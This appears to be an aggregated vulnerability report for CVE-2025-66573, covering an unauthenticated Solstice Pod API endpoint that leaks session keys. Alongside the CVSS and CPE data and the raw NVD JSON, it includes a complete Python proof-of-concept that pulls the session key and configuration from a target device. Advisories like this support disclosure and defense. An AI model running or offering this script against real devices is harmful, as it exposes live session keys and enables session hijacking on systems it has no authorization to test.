Security Vulnerability Report
中文
CVE-2025-66573 CVSS 7.5 HIGH

CVE-2025-66573

Published: 2025-12-04 21:16:10
Last Modified: 2025-12-23 00:09:25
Source: [email protected]

Description

Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:mersive:solstice_pod_firmware:5.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:mersive:solstice_pod_firmware:6.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mersive:solstice_pod:-:*:*:*:*:*:*:* - NOT VULNERABLE
Solstice Pod API < 5.5
Solstice Pod API 5.5
Solstice Pod API 6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66573 PoC - Solstice Pod API Session Key Extraction This PoC demonstrates the unauthenticated access to /api/config endpoint that exposes sensitive session information including session keys. """ import requests import json import sys def exploit_cve_2025_66573(target_url): """ Extract sensitive information from Solstice Pod API /api/config endpoint without authentication. Args: target_url: Base URL of the Solstice Pod device (e.g., http://192.168.1.100) Returns: dict: Extracted configuration data including session key """ # Target the vulnerable /api/config endpoint config_endpoint = f"{target_url.rstrip('/')}/api/config" print(f"[*] Targeting: {config_endpoint}") print(f"[*] CVE-2025-66573: Solstice Pod API Session Key Extraction") print("-" * 60) try: # Send GET request without authentication response = requests.get(config_endpoint, timeout=10) if response.status_code == 200: print("[+] Request successful - endpoint is accessible") print(f"[+] Status Code: {response.status_code}") # Parse JSON response try: config_data = response.json() print("\n[+] Extracted Sensitive Information:") print("-" * 60) # Display key information if 'sessionKey' in config_data: print(f"[+] Session Key: {config_data['sessionKey']}") if 'version' in config_data: print(f"[+] Server Version: {config_data['version']}") if 'displayName' in config_data: print(f"[+] Display Name: {config_data['displayName']}") # Print full response for analysis print("\n[+] Full Response:") print(json.dumps(config_data, indent=2)) return config_data except json.JSONDecodeError: print("[!] Response is not valid JSON") print(f"Response: {response.text}") return None elif response.status_code == 401: print("[-] Endpoint requires authentication (patched)") return None elif response.status_code == 404: print("[-] Endpoint not found - target may not be vulnerable") return None else: print(f"[-] Unexpected status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None def main(): if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://192.168.1.100") sys.exit(1) target = sys.argv[1] result = exploit_cve_2025_66573(target) if result: print("\n[!] Vulnerability confirmed - sensitive data exposed") else: print("\n[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66573", "sourceIdentifier": "[email protected]", "published": "2025-12-04T21:16:10.083", "lastModified": "2025-12-23T00:09:25.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Solstice Pod API (version 5.5, 6.2) contains an unauthenticated API endpoint (`/api/config`) that exposes sensitive information such as the session key, server version, product details, and display name. Unauthorized users can extract live session information by accessing this endpoint without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mersive:solstice_pod_firmware:5.6:*:*:*:*:*:*:*", "matchCriteriaId": "F813116A-47F5-47EC-9206-F51C4C73C60C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:mersive:solstice_pod_firmware:6.2:*:*:*:*:*:*:*", "matchCriteriaId": "8634D879-8398-468E-BBD4-9154686700ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mersive:solstice_pod:-:*:*:*:*:*:*:*", "matchCriteriaId": "2208F1E1-4F8B-416E-B46C-40A8E862B55B"}]}]}], "references": [{"url": "https://documentation.mersive.com/en/solstice/about-solstice.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/52104", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.mersive.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/solstice-pod-api-session-key-extraction-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/52104", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.